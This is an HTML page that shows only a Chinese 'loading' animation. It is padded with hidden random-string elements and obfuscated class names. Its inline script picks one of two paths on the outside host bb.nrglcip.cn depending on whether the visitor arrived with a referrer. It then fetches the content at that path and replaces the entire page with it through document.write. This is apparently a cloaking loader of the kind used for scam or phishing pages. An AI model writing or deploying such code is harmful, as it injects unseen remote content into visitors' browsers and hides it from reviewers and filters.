<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .rzbnnE0 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .rzbnnE0 .OSY1xHbXCGw {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .rzbnnE0 .content {
            line-height: 50px;
            text-align: center
        }

        .rzbnnE0 .img {
            width: 100%
        }

        .rzbnnE0 .omoBrk {
            text-align: center
        }

        .rzbnnE0 .omoBrk span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .rzbnnE0 .omoBrk span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .rzbnnE0 .omoBrk span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .rzbnnE0 .omoBrk span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .rzbnnE0 .omoBrk span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .rzbnnE0 .omoBrk span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .rzbnnE0 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VPFqXW2XUyy(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EfQLn0A = VPFqXW2XUyy('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EfQLn0A +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EfQLn0A +".html?a=share";
		}
		
        lnJ9Pqn0hR=url+"#"+new Date().getTime();
        lnJ9Pqn0hR && function() {
            $.get(lnJ9Pqn0hR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>uPu2XeX9MAfWGTvFILAzYoHhtpLDWw6SJkeT7nkCn5azw</p>
<span style='display:none'>vH0pyXRROToej3AFu</span>
<li style='display:none' >DtX2yWNSQTlMl0oGyBjmvl5SZNbUEWGwlWdd2BLhNBY7IKx5DshuoEb</li><div class="rzbnnE0">
    <div class="OSY1xHbXCGw">
        <div class="omoBrk">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >PwaE4SCHjrkkW7TknK5lUEve8dXxBYc1XRPRz</b>
<a  href='#' style='display:none'>YpnuQ0jd0XnPxDu83vImpDJDaU4A4nDkXCJWopDhDh54cKu1k5iiiGrVpCth5ZcARgW47FC0m6W</a>
<span style='display:none'>MI638gHJhIPSZ5UlGtAzLc75bOANsRGy0m2UYDZrUpV93H9kqsCggBqTgq2zrssruBUbSswrhDjBFgKu5lLB36rspVqTtRMVb</span>
<ul style='display:none' >OlDezLuFJVXZBObCATP68TEbBRqmK7RW2YpRbsf6rX6d22mMQb1Yswh0Avuw8bBd36gkMKB3auJdXLzrcvLvPaA3IHEzlLZMpb0Gl</ul></body>
</html>